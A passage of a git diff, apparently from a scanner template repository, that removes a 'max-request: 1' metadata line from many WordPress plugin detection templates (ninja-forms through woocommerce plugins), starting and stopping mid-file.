a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 829edad042..56d2e4efcd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: 